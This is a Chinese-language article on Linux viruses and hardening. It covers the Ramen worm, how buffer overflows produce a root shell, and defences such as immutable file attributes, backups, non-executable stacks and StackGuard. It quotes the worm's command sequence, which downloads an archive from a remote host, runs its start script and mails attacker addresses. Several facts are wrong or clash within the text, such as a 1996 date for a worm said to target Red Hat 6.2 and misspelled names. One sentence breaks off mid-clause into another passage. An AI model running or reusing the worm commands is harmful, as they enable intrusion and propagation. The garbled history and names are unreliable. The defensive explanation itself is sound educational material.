由于Linux操作系統是一個開放源代碼的免費操作系統, 因此受到越來越多用戶的歡迎。隨著Linux操作系統在我國的不斷普及,Linux操作系統一直被認為是微軟Windows軟件系統的勁敵,因為它不僅安全、穩定、成本低,而且很少發現有病毒傳播。但是,隨著越來越多的服務器、工作站和個人電腦使用Linux軟件,電腦病毒制造者也開始攻擊這一系統。于1996年被發現的Ramen是Linux系統下的第一個病毒,如果說剛開始時Linux病毒向人們展示的僅僅是一個概念,那么,Ramen病毒的發現,則已經開始引起了人們的擔心。雖然很多人認為,嚴格來講,Reman并不能稱為病毒,但是這已經讓很多對Linux的安全性信心百倍的用戶大吃一驚了。
可以看到,從1996年至今,新的Linux病毒屈指可數,這說明Linux是一個健壯的、具有先天病毒免疫能力的操作系統。當然除了其自身設計優秀外,年輕,也是Linux很少受到病毒攻擊的原因之一。事實上,所有的操作系統(包括DOS和Windows)在其產生之初,也很少受到各種病毒的侵擾。然而正如Trend Micro的反病毒部門歐洲總裁Raimond Genes所說的,“當然我們將看到對于Windows的越來越多的攻擊,但是Linux也將成為一個目標,因為它的使用正在變得越來越普及,這是一個穩定的操作系統,但并不是一個完全安全的系統而LINUX方面關于世界上第一個Linux病毒——reman已經出現的說法,我們得到該病毒的有關資料和樣本之后發現,嚴格地說,reman并不能被稱為病毒。實際上這是一個古老的,在UNIX/Linux世界早已存在的“緩沖區溢出”攻擊程序。幾乎所有UNIX/Linux版本中都或多或少地存在這樣的問題。第一次此種類型的攻擊(morris worm),到現在已經十多年了,并不是等到現在才“出現”的。事實上針對windows 98/NT的緩沖區溢出攻擊也是很常見的。
緩沖區溢出的原理是:向一個有限空間的緩沖區拷貝了過長的字符串,覆蓋相鄰的存儲單元,會引起程序運行失敗。因為自動變量保存在堆棧當中,當發生緩沖區溢出的時候,存儲在堆棧中的函數反回地址也會被覆蓋從而無法從發生溢出的函數正常返回(返回地址往往是一個無效的地址),在這樣的情況下系統一般報告:“core dump”或“segment fault”。嚴重的是:如果覆蓋緩沖區的是一段精心設計的機器指令序列,它可能通過溢出,改變返回地址,將其指向自己的指令序列,從而改變該程序的正常流程。這段精心設計的指令一般的目的是:“/bin/sh”,所以這段代碼被稱為:“shell code”。通過這樣的溢出可以得到一個shell,僅此而已。但是,如果被溢出是一個suid root程序,得到的將是一個root shell。這樣機器的控制權已經易手,此后發生的任何事情都是合理的。
下面我們回到reman。它首先對網絡上的主機進行掃描,通過兩個普通的漏洞進入系統,獲取root權限,然后從源主機復制自身,以繼續掃描網上其他服務器。對于Red Hat 6.2來講,如果攻擊成功,它會做以下工作:
mkdir /usr/src/.poop;cd /usr/src/.poop export TERM=vt100 lynx -source http://FROMADDR:27374 > /usr/src/.poop/ramen.tgz cp ramen.tgz /tmp gzip -d ramen.tgz;tar -xvf ramen.tar;./start.sh echo Eat Your Ramen! | mail -s TOADDR -c gb31337@hotmail.com gb31337@yahoo.com |
但我們對于LINUX的安全措施仍需要注意.
一、文件系統在Linux系統中,分別為不同的應用安裝單獨的主分區將關鍵的分區設置為只讀將大大提高文件系統的安全。這主要涉及到Linux自身的ext2文件系統的只添加(只添加)和不可變這兩大屬性。
◆文件分區Linux的文件系統可以分成幾個主要的分區,每個分區分別進行不同的配置和安裝,一般情況下至少要建立/、/usr/local、/var和/home等分區。/usr可以安裝成只讀并且可以被認為是不可修改的。如果/usr中有任何文件發生了改變,那么系統將立即發出安全報警。當然這不包括用戶自己改變/usr中的內容。
/lib、/boot和/sbin的安裝和設置也一樣。在安裝時應該盡量將它們設置為只讀,并且對它們的文件、目錄和屬性進行的任何修改都會導致系統報警。
當然將所有主要的分區都設置為只讀是不可能的, 有的分區如/var等,其自身的性質就決定了不能將它們設置為只讀,但應該不允許它具有執行權限。
◆擴展ext2使用ext2文件系統上的只添加和不可變這兩種文件屬性可以進一步提高安全級別。不可變和只添加屬性只是兩種擴展ext2文件系統的屬性標志的方法。
一個標記為不可變的文件不能被修改,甚至不能被根用戶修改。一個標記為只添加的文件可以被修改,但只能在它的后面添加內容,即使根用戶也只能如此。
可以通過chattr命令來修改文件的這些屬性,如果要查看其屬性值的話可以使用lsattr命令。要想了解更多的關于ext2文件屬性的信息,可使用命令man chattr來尋求幫助。這兩上文件屬性在檢測黑客企圖在現有的文件中安裝入侵后門時是很有用的。為了安全起見,一旦檢測到這樣的活動就應該立即將其阻止并發出報警信息。
如果你的關鍵的文件系統安裝成只讀的并且文件被標記為不可變的,入侵者必須重新安裝系統才能刪除這些不可變的文件但這會立刻產生報警,這樣就大大減少了被非法入侵的機會。
◆保護log文件當與log文件和log備份一起使用時不可變和只添加這兩種文件屬性特別有用。系統管理員應該將活動的log文件屬性設置為只添加。當log被更新時,新產生的log備份文件屬性應該設置成不可變的,而新的活動的log文件屬性又變成了只添加。這通常需要在log更新腳本中添加一些控制命令。
二、備份在完成Linux系統的安裝以后應該對整個系統進行備份,以后可以根據這個備份來驗證系統的完整性,這樣就可以發現系統文件是否被非法竄改過。如果發生系統文件已經被破壞的情況,也可以使用系統備份來恢復到正常的狀態。
◆CD-ROM備份當前最好的系統備份介質就是CD-ROM光盤,以后可以定期將系統光盤內容進行比較以驗證系統的完整性是否遭到破壞。如果對安全級別的要求特別高,那么可以將光盤設置為可啟動的并且將驗證工作作為系統啟動過程的一部分。這樣只要可以通過光盤啟動,就說明系統尚未被破壞過。
如果你創建了一個只讀的分區,那么可以定期從光盤映像重新裝載它們。即使象/boot、/lib和/sbin這樣不能被安裝成只讀的分區,你仍然可以根據光盤映像來檢查它們,甚至可以在啟動時從另一個安全的映像重新下載它們。
◆其它方式的備份雖然/etc中的許多文件經常會變化,但/etc中的許多內容仍然可以放到光盤上用于系統完整性驗證。其它不經常進行修改的文件,可以備份到另一個系統(如磁帶)或壓縮到一個只讀的目錄中。這種辦法可以在使用光盤映像進行驗證的基礎上再進行額外的系統完整性檢查。
既然現在絕大多數操作系統現在都在隨光盤一起提供的,制作一個CD-ROM緊急啟動盤或驗證盤操作起來是十分方便的,它是一種十分有效而又可行的驗證方法。
三、改進系統內部安全機制可以通過改進Linux操作系統的內部功能來防止緩沖區溢出攻擊這種破壞力極強卻又最難預防的攻擊方式,雖然這樣的改進需要系統管理員具有相當豐富的經驗和技巧,但對于許多對安全級別要求高的Linux系統來講還是很有必要的。
◆Solaris Designer的安全Linux補丁Solaris Designer用于2.0版內核的安全Linux補丁提供了一個不可執行的棧來減少緩沖區溢出的威脅,從而大大提高了整個系統的安全性。
緩沖區溢出實施起來是相當困難的,因為入侵者必須能夠判斷潛在的緩沖區溢出何時會出現以及它在內存中的什么位置出現。緩沖區溢出預防起來也十分困難,系統管理員必須完全去掉緩沖區溢出存在的條件才能防止這種方式的攻擊。正因為如此,許多人甚至包括Linux Torvalds本人也認為這個安全Linux補丁十分重要,因為它防止了所有使用緩沖區溢出的攻擊。但是需要引起注意的是,這些補丁也會導致對執行棧的某些程序和庫的依賴問題,這些問題也給系統管理員帶來的新的挑戰。
不可執行的棧補丁已經在許多安全郵件列表(如securedistros@nl.linux.org)中進行分發,用戶很容易下載到它們等。
◆StackGuardStackGuard是一個十分強大的安全補丁工具。你可以使用經StackGuard修補過的gcc版本來重新編譯和鏈接關鍵的應用。
StackGuard進行編譯時增加了棧檢查以防止發生棧攻擊緩沖區溢出,雖然這會導致系統的性能略有下降,但對于安全級別要求高的特定應用來講StackGuard仍然是一個十分管用的工具。
現在已經有了一個使用了SafeGuard的Linux版本,用戶使用StackGuard將會更加容易。雖然使用StackGuard會導致系統性能下降約10~20%,但它能夠防止整個緩沖區溢出這一類攻擊。
◆增加新的訪問控制功能Linux的2.3版內核正試圖在文件系統中實現一個訪問控制列表,這要可以在原來的三類(owner、group和other)訪問控制機制的基礎上再增加更詳細的訪問控制。
在2.2和2.3版的Linux內核中還將開發新的訪問控制功能,它最終將會影響當前有關ext2文件屬性的一些問題。與傳統的具有ext2文件系統相比它提供了一個更加精確的安全控制功能。有了這個新的特性,應用程序將能夠在不具有超級用戶權限的情況下訪問某些系統資源,如初始套接等。
◆基于規則集的訪問控制現在有關的Linux團體正在開發一個基于規則的訪問。
